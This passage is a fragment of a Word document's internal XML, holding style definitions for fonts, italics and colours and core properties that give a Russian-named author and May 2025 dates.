      <w:ind w:left="70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A3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A3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3DDB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001A3DD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A3DD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A3D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A3DDB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="001A3DD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C2EF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11E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x4m/pg_cve_dem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Зазуля Антон Александрович</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Зазуля Антон Александрович</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-11T07:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-11T08:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>